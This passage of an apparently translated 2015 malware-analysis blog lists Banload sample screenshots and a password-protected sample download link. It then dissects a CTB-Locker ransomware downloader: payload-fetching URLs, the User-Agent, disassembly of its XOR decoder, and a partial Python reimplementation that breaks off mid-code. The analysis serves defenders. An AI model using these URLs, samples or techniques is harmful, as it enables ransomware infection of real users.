<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Yax4KStWrlrxpI7FNxDDZEzn5z79Y8PKS4cBKOSFcCHuRZTvgU7eeM4H9jB29sAJkNeiJyR-WmFU5XY4s6tdBgq8x0p1wtJ_-JB5JujwFnqrJfc9WWCCCf5Bz64HIyAeHH_bpEBkAE0/s1600/01-itau.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Yax4KStWrlrxpI7FNxDDZEzn5z79Y8PKS4cBKOSFcCHuRZTvgU7eeM4H9jB29sAJkNeiJyR-WmFU5XY4s6tdBgq8x0p1wtJ_-JB5JujwFnqrJfc9WWCCCf5Bz64HIyAeHH_bpEBkAE0/s320/01-itau.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUBQ-Mj534hM2H6aJb0M-ieabZm87HfyXMlkB6gYeIKwjRl1BhuO-UoE1X19SxzuDJhUe9nJImNuubJv2_MKU9G973aDLT02XZnRYzBTMKFIKAjNeUoQqrvTGy79Eul6NNwerKCi1FbjA/s1600/01-santander.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUBQ-Mj534hM2H6aJb0M-ieabZm87HfyXMlkB6gYeIKwjRl1BhuO-UoE1X19SxzuDJhUe9nJImNuubJv2_MKU9G973aDLT02XZnRYzBTMKFIKAjNeUoQqrvTGy79Eul6NNwerKCi1FbjA/s320/01-santander.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9zKuYRjSmf8vX1CqFGbTu9fXpcK9Fp8p17p8ATLpiIKZDUs7DGNzeglP5F7smIUy4VtliMtXNLXiCz_FE5DzTTdI7BJnaSyzf-dEA416y8NTM7AJWOmEuqEKizSP7WFOQ2We2nrVb3IA/s1600/01.sicredi.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9zKuYRjSmf8vX1CqFGbTu9fXpcK9Fp8p17p8ATLpiIKZDUs7DGNzeglP5F7smIUy4VtliMtXNLXiCz_FE5DzTTdI7BJnaSyzf-dEA416y8NTM7AJWOmEuqEKizSP7WFOQ2We2nrVb3IA/s320/01.sicredi.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF0nCaT-ATcycJP3so0q-RB6zSWcBd6EJqnau3Rsm7xMzi1yxa203QJFkpkCEB78i7-YjzGer8hjcCLW8rDjcKzySmmM9pHaBX6Hxz1kq9Hy2VGo09xA6F6VSQfvmz-2NBuRZ61f-dx60/s1600/02-bancodobrasil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF0nCaT-ATcycJP3so0q-RB6zSWcBd6EJqnau3Rsm7xMzi1yxa203QJFkpkCEB78i7-YjzGer8hjcCLW8rDjcKzySmmM9pHaBX6Hxz1kq9Hy2VGo09xA6F6VSQfvmz-2NBuRZ61f-dx60/s320/02-bancodobrasil.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0QCH2nGgMQWcovRFt6bpu71YepE1pzhFUEfL5aMpNG2REaUemgzniQnNP6on1jMP-b_qP-vUj3b1hWdDDCg2GvqrOtiaDKHCp6Z6_7FGkcodyiOMSTbHZ-Bjf5IsTuZc3CCtFHFA8fA8/s1600/02-bradesco.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0QCH2nGgMQWcovRFt6bpu71YepE1pzhFUEfL5aMpNG2REaUemgzniQnNP6on1jMP-b_qP-vUj3b1hWdDDCg2GvqrOtiaDKHCp6Z6_7FGkcodyiOMSTbHZ-Bjf5IsTuZc3CCtFHFA8fA8/s320/02-bradesco.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpxoTkM3_GX-pugd7LLdUUeBLq6WFeaQZsHjhvLJU64dvCqleF9j2pP60ecLVJZifP6d2IoYpOnBjlhJueze3762vZ_gRrXgmwP7zlprq38o4pUQ0v6i8mI-1S7XhzUA6Rti3MnroaSaA/s1600/02-caixa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpxoTkM3_GX-pugd7LLdUUeBLq6WFeaQZsHjhvLJU64dvCqleF9j2pP60ecLVJZifP6d2IoYpOnBjlhJueze3762vZ_gRrXgmwP7zlprq38o4pUQ0v6i8mI-1S7XhzUA6Rti3MnroaSaA/s320/02-caixa.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYWTthnq_gNBa0HFIZeFToI7lVqsBvCNN4J5Y2iE8Te0IZoEkElPlc8dFpwx17nmW9t2Sjv4ymbjtUS2DELGoXwExTqEPiXezAGlDUGNi3-DT-S_586jWeN1gXVoiVj9cYlveXtRcvTO0/s1600/02-itau.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYWTthnq_gNBa0HFIZeFToI7lVqsBvCNN4J5Y2iE8Te0IZoEkElPlc8dFpwx17nmW9t2Sjv4ymbjtUS2DELGoXwExTqEPiXezAGlDUGNi3-DT-S_586jWeN1gXVoiVj9cYlveXtRcvTO0/s320/02-itau.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFzLs7YoKhBmUoHdybcMS9hK5TGXqVXR7-H5ivUwNTodoBYFIbJ0s8iMc2PiUPioUkMldXvdNjjfXpy2jLcS8KJW2LLNWDj5cBmPEObAtyBHNRKQmBOfGem2Hmo_zkqvkzpF7dIswI6_0/s1600/02-santander.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFzLs7YoKhBmUoHdybcMS9hK5TGXqVXR7-H5ivUwNTodoBYFIbJ0s8iMc2PiUPioUkMldXvdNjjfXpy2jLcS8KJW2LLNWDj5cBmPEObAtyBHNRKQmBOfGem2Hmo_zkqvkzpF7dIswI6_0/s320/02-santander.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZOla9IJzX6GdftCZBEtaDWSWuhaEc3xvH50Xd1L8_XB2HA1tqC0f_8hFLvkIGydzEaXZbs33PjPL6oZ2VftjdHfDH3wab06EJmNOvKraUAqvnCbPAvFhTtGUoOZml1vjeJXN7XrfDXhc/s1600/03-caixa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZOla9IJzX6GdftCZBEtaDWSWuhaEc3xvH50Xd1L8_XB2HA1tqC0f_8hFLvkIGydzEaXZbs33PjPL6oZ2VftjdHfDH3wab06EJmNOvKraUAqvnCbPAvFhTtGUoOZml1vjeJXN7XrfDXhc/s320/03-caixa.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkTzrswHzm32axDaxo4Wg9-7PL2dRu0jN8bqTUhITFaTJchRMu8oVhqiIYgwQtinALK-l_kKgsfeH00Q-NdhIQL4Ooulxd_8vdmkvwBPuBwUAGmmuLbNqmyhGx76KKtLI5AAcSw-aAep8/s1600/03-itau.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkTzrswHzm32axDaxo4Wg9-7PL2dRu0jN8bqTUhITFaTJchRMu8oVhqiIYgwQtinALK-l_kKgsfeH00Q-NdhIQL4Ooulxd_8vdmkvwBPuBwUAGmmuLbNqmyhGx76KKtLI5AAcSw-aAep8/s320/03-itau.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0cWUWiCXzGae80jAEnltZDDLrfToC4tjj470cgDLgBSdn0dU6q6-5aOTlmTWTTllgTXwVxVhKzd6sGzExxkjvU-cvO72SVhI03ros1ts0wBIog2R2Wf0lKECASd1cmMv9p6L0lAraqLc/s1600/03-santander.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0cWUWiCXzGae80jAEnltZDDLrfToC4tjj470cgDLgBSdn0dU6q6-5aOTlmTWTTllgTXwVxVhKzd6sGzExxkjvU-cvO72SVhI03ros1ts0wBIog2R2Wf0lKECASd1cmMv9p6L0lAraqLc/s320/03-santander.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGPpZojPnnZ0071G3HA_8gxjkW1Pg7Dbej94VwFFmXlIi3ppc0ThbEtC5j6gKIm4dbDsK6X4C_O3ibLWIDzzopeGgs6ArbqoxNc3nk3bOnXiqumvC1iUWeGbUmYcV-WifGZIVH70aFL40/s1600/04-itau.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGPpZojPnnZ0071G3HA_8gxjkW1Pg7Dbej94VwFFmXlIi3ppc0ThbEtC5j6gKIm4dbDsK6X4C_O3ibLWIDzzopeGgs6ArbqoxNc3nk3bOnXiqumvC1iUWeGbUmYcV-WifGZIVH70aFL40/s320/04-itau.jpg" width="320" /></a></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Samples: https://www.dropbox.com/s/un61utogo6d2px9/Banload-9-06-15.zip?dl=0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">password = infected</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">That's all for now.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2015</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>CTB-Locker Ransomware Campaign</b> (2015-01-24)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Last week there was a large CTB-Locker ransomware campaign. The malicious emails were sent to many Latin American accounts; the curious, and at the same time comical, part is that the emails were written in several languages such as Arabic, German and English. Even so, many people ran the attachments...</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">You can read an ESET advisory about this campaign <a href="http://www.welivesecurity.com/la-es/2015/01/20/ctb-locker-ransomware-ataca-nuevo/">here</a>. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSTKsJ9N0zJWhcYk-6ixh9XitwTh4HzWeglOgYuaH_9GLqBUZAIh8N0uuzB-kzlIX_LCmMofSkElXbH_Gj1BeBejI3xXQBX2IKVxNofFMyB9WNDb5Sxg309Btwkrer8pF2F_dScTAK3KY/s1600/fake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSTKsJ9N0zJWhcYk-6ixh9XitwTh4HzWeglOgYuaH_9GLqBUZAIh8N0uuzB-kzlIX_LCmMofSkElXbH_Gj1BeBejI3xXQBX2IKVxNofFMyB9WNDb5Sxg309Btwkrer8pF2F_dScTAK3KY/s1600/fake.jpg" height="320" width="305" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">This is what the malicious emails looked like. Thanks to Raul for the samples.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The executable is an .scr wrapped in a layer from a not very elaborate crypter.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">VirusTotal analysis of the dumped downloader.</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTt39tunMATKvC2I4Bofqx4ZtckRd1zFpZaK08XlSeKsWWd3RbF7w4_0N2qBcwicaJsMmmMtqpPKtSGwHtRv34y4Im6GELqVkYJ9321QCgDm8CoMswJ7eXlqFxNcPtN-ULrfGJUlR7q2U/s1600/VT01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTt39tunMATKvC2I4Bofqx4ZtckRd1zFpZaK08XlSeKsWWd3RbF7w4_0N2qBcwicaJsMmmMtqpPKtSGwHtRv34y4Im6GELqVkYJ9321QCgDm8CoMswJ7eXlqFxNcPtN-ULrfGJUlR7q2U/s1600/VT01.jpg" height="115" width="400" /></a></div>
<div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The downloader connects to the following sites to fetch the payload (CTB-Locker), using the following </span><span style="font-family: Arial, Helvetica, sans-serif;">User-Agent:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">UNICODE <b>"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ6625ZWaoQ_bM_bFJjrekoWTRgaYbzcYaTg8IBzafmvQco58ouRgOd7klXNE4iyRDSHl5QSqvGl3G278XFHdXZMxWKAS7Dx_q1nYO1CEEh2ZCBfRN-tvu_3fYQ1-jteDynkPklrriD_k/s1600/01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ6625ZWaoQ_bM_bFJjrekoWTRgaYbzcYaTg8IBzafmvQco58ouRgOd7klXNE4iyRDSHl5QSqvGl3G278XFHdXZMxWKAS7Dx_q1nYO1CEEh2ZCBfRN-tvu_3fYQ1-jteDynkPklrriD_k/s1600/01.png" height="285" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004014AD MOV DWORD PTR SS:[EBP-38],Dumped.004010B UNICODE "voigt-its.de/fit/pack.tar.gz"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004014B4 MOV DWORD PTR SS:[EBP-30],Dumped.004010F UNICODE "maisondessources.com/assets/pack.tar.gz"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004014BB MOV DWORD PTR SS:[EBP-28],Dumped.0040114 UNICODE "jbmsystem.fr/jb/pack.tar.gz"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004014C2 MOV DWORD PTR SS:[EBP-20],Dumped.0040117 UNICODE "pleiade.asso.fr/piwigotest/pack.tar.gz"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004014C9 MOV DWORD PTR SS:[EBP-18],Dumped.004011C UNICODE "scolapedia.org/histoiredesarts/pack.tar.gz"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Fake message shown by the downloader to mislead the victim who runs it; this file is stored in the executable's resources as an .rtf.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh26-md7ObX8ESeq_VIw_tx5Ub1pMzMMWQYy6tMkE4TBpfZ7HwFmAw0AwDOr_v18cwjk4fk6DTQF_-IgvYkPgqPzLoSM9xFnMiyoOCEJCnHzr2qTRLBDVuBYpzelSxmGS88rFX_E2kdzF0/s1600/mensajefake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh26-md7ObX8ESeq_VIw_tx5Ub1pMzMMWQYy6tMkE4TBpfZ7HwFmAw0AwDOr_v18cwjk4fk6DTQF_-IgvYkPgqPzLoSM9xFnMiyoOCEJCnHzr2qTRLBDVuBYpzelSxmGS88rFX_E2kdzF0/s1600/mensajefake.jpg" height="302" width="400" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Dynamic analysis of the connections</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The downloader fetches the malicious payload over HTTPS and also connects to Windows Update to throw us off a bit. (<b>It actually does this to check whether the machine has an internet connection. Thanks to MOC for the clarification.</b>)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004016C3 PUSH Dumped.00401258 UNICODE "windowsupdate.microsoft.com/"</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmP8HvWYYwWjuOF9nXmYpQWIyF4ejick4QkMCib9DhceNdAJm1eu9sZLaEJ5VaSESimKEX3Kgv6gWESSc-ti3iZDx_iYbmxcppUN8syX-5ArHN3x1pHe_YyoU8aw7vtIW2wU4jcFOw1OQ/s1600/trafico+Wupdate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmP8HvWYYwWjuOF9nXmYpQWIyF4ejick4QkMCib9DhceNdAJm1eu9sZLaEJ5VaSESimKEX3Kgv6gWESSc-ti3iZDx_iYbmxcppUN8syX-5ArHN3x1pHe_YyoU8aw7vtIW2wU4jcFOw1OQ/s1600/trafico+Wupdate.jpg" height="193" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYJzIeFbQtj_Ermq-rtOXZ_SRJ0UA-61LOJuxeemplezQupHprnttMDtxfreuwGzE3viVcZt4i-ZKX7sHNb88SSCwBP4eari6ise1iTA3E8pV7tjAIZ25AQUjqXIVJk7ltBuRenElEPYY/s1600/trafico+443.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYJzIeFbQtj_Ermq-rtOXZ_SRJ0UA-61LOJuxeemplezQupHprnttMDtxfreuwGzE3viVcZt4i-ZKX7sHNb88SSCwBP4eari6ise1iTA3E8pV7tjAIZ25AQUjqXIVJk7ltBuRenElEPYY/s1600/trafico+443.jpg" height="178" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">The downloaded file is not a tar.gz; it is encoded and goes through the following XOR routine, which decodes it and writes it to disk as an executable.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040179E /$ 55 PUSH EBP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040179F |. 8BEC MOV EBP,ESP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017A1 |. 83EC 10 SUB ESP,10</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017A4 |. 53 PUSH EBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017A5 |. 57 PUSH EDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017A6 |. 33DB XOR EBX,EBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017A8 |. 33FF XOR EDI,EDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017AA |. C645 F0 20 MOV BYTE PTR SS:[EBP-10],20</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017AE |. C645 F1 21 MOV BYTE PTR SS:[EBP-F],21</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017B2 |. C645 F2 05 MOV BYTE PTR SS:[EBP-E],5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017B6 |. C645 F3 50 MOV BYTE PTR SS:[EBP-D],50</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017BA |. C645 F4 77 MOV BYTE PTR SS:[EBP-C],77</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017BE |. C645 F5 1B MOV BYTE PTR SS:[EBP-B],1B</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017C2 |. C645 F6 51 MOV BYTE PTR SS:[EBP-A],51</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017C6 |. C645 F7 FA MOV BYTE PTR SS:[EBP-9],0FA</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017CA |. C645 F8 0E MOV BYTE PTR SS:[EBP-8],0E</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017CE |. C645 F9 D5 MOV BYTE PTR SS:[EBP-7],0D5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017D2 |. C645 FA E8 MOV BYTE PTR SS:[EBP-6],0E8</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017D6 |. C645 FB 28 MOV BYTE PTR SS:[EBP-5],28</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017DA |. C645 FC EB MOV BYTE PTR SS:[EBP-4],0EB</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017DE |. C645 FD 4B MOV BYTE PTR SS:[EBP-3],4B</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017E2 |. C645 FE A5 MOV BYTE PTR SS:[EBP-2],0A5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017E6 |. C645 FF DA MOV BYTE PTR SS:[EBP-1],0DA</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017EA |. 395D 0C CMP DWORD PTR SS:[EBP+C],EBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017ED |. 76 26 JBE SHORT Dumped.00401815</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017EF |. 56 PUSH ESI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017F0 |> 8B45 08 /MOV EAX,DWORD PTR SS:[EBP+8]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017F3 |. 8D3403 |LEA ESI,DWORD PTR DS:[EBX+EAX]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017F6 |. 8A0E |MOV CL,BYTE PTR DS:[ESI]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017F8 |. 8D543D F0 |LEA EDX,DWORD PTR SS:[EBP+EDI-10]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017FC |. 8A02 |MOV AL,BYTE PTR DS:[EDX]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017FE |. 32C8 |XOR CL,AL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401800 |. 32C1 |XOR AL,CL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401802 |. 47 |INC EDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401803 |. 880E |MOV BYTE PTR DS:[ESI],CL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401805 |. 8802 |MOV BYTE PTR DS:[EDX],AL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401807 |. 83FF 10 |CMP EDI,10</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040180A |. 75 02 |JNZ SHORT Dumped.0040180E</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040180C |. 33FF |XOR EDI,EDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040180E |> 43 |INC EBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040180F |. 3B5D 0C |CMP EBX,DWORD PTR SS:[EBP+C]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401812 |.^72 DC \JB SHORT Dumped.004017F0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401814 |. 5E POP ESI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401815 |> 5F POP EDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401816 |. 5B POP EBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401817 |. C9 LEAVE</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401818 \. C3 RETN</span><br />
<div>
<br /></div>
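<span style="font-family: Arial, Helvetica, sans-serif;">To turn the listing above into something usable on a captured pack.tar.gz, here is a Python reimplementation of the decoder. This is an added example, not the author's code or tooling: the 16 key bytes are copied from the MOV BYTE PTR instructions at 004017AA-004017E6, and the loop mirrors what the routine does between 004017F0 and 00401812. Note the two XORs: CL ^= AL yields the decoded byte, and AL ^= CL then restores the encoded byte, which is written back into the key slot just used. So the key is a rolling one: bytes 0-15 are XORed with the initial key, and every later byte is XORed with the encoded byte 16 positions earlier. The inverse transform, the fake PE header and the function names are assumptions used only to exercise the decoder offline.</span>

```python
"""Reimplementation of the rolling-key XOR decoder used by the CTB-Locker downloader.

Added example; not the blog author's code.  The key bytes are taken from the
disassembly at 0040179E; everything else (names, the fake PE header) is constructed.
"""
import sys

# The 16 key bytes stored at [EBP-10] .. [EBP-1] in the listing.
INITIAL_KEY = bytes([
    0x20, 0x21, 0x05, 0x50, 0x77, 0x1B, 0x51, 0xFA,
    0x0E, 0xD5, 0xE8, 0x28, 0xEB, 0x4B, 0xA5, 0xDA,
])


def decode_payload(encoded: bytes, key: bytes = INITIAL_KEY) -> bytes:
    """Mirror of the loop at 004017F0-00401812.

    For every input byte: out = enc ^ key[k]; key[k] = enc; k = (k + 1) % 16.
    Hence plain[i] == enc[i] ^ key[i] for i < 16 and
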